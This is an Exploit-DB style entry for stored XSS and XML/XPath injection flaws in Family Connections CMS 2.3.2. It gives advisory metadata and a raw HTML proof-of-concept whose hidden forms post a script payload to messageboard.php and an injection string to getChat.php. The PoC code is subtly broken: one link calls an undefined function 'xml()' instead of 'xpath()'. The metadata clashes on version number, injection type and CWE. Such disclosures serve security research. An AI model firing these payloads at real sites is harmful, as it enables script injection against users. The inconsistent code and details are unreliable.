Family Connections CMS 2.3.2 Stored XSS And XPath Injection

vendor:

Family Connections

by:

Gjoko 'LiquidWorm' Krstic

7.5

CVSS

HIGH

Stored XSS and XML Injection

79, 89

CWE

Product Name: Family Connections

Affected Version From: 2.3.2002

Affected Version To: 2.3.2002

Patch Exists: NO

Related CWE: N/A

CPE: a:ryan_haudenschilt:family_connections:2.3.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Microsoft Windows XP Professional SP3 (EN), Apache 2.2.14 (Win32), PHP 5.3.1, MySQL 5.1.41

2011

Family Connections CMS 2.3.2 Stored XSS And XPath Injection

Family Connections is an open source content management system. It makes creating a private, family website easy and fun. FCMS suffers from a stored XSS vulnerability (post-auth) in messageboard.php script thru the 'subject' post parameter. XML Inj. lies in the /inc/getChat.php script with 'users' get parameter with no args, and post parameter 'message'.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

<!--


Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection


Vendor: Ryan Haudenschilt
Product web page: http://www.familycms.com
Affected version: 2.3.2

Summary: Family Connections is an open source
content management system. It makes creating a
private, family website easy and fun.

Desc: FCMS suffers from a stored XSS vulnerability
(post-auth) in messageboard.php script thru the
'subject' post parameter. XML Inj. lies in the
/inc/getChat.php script with 'users' get parameter with
no args, and post parameter 'message'.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk


Advisory ID: ZSL-2011-5004
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php


22.03.2011


-->



<html>
<title>Family Connections CMS 2.3.2 Stored XSS And XPath Injection</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xpath(){document.forms["xml"].submit();}
function xss(){document.forms["xss"].submit();}
</script>
<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xml">
<input type="hidden" name="message" value="\\';--\\";--" /></form>
<a href="javascript: xml();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XML Injection!<h3></center></font></b></a>
<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="subject" value='"><script>alert(1)</script>' />
<input type="hidden" name="post" value="waddup" />
<input type="hidden" name="name" value="1" />
<input type="hidden" name="post_submit" value="Submit" /></form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XSS!<h3></center></font></b></a>
</body></html>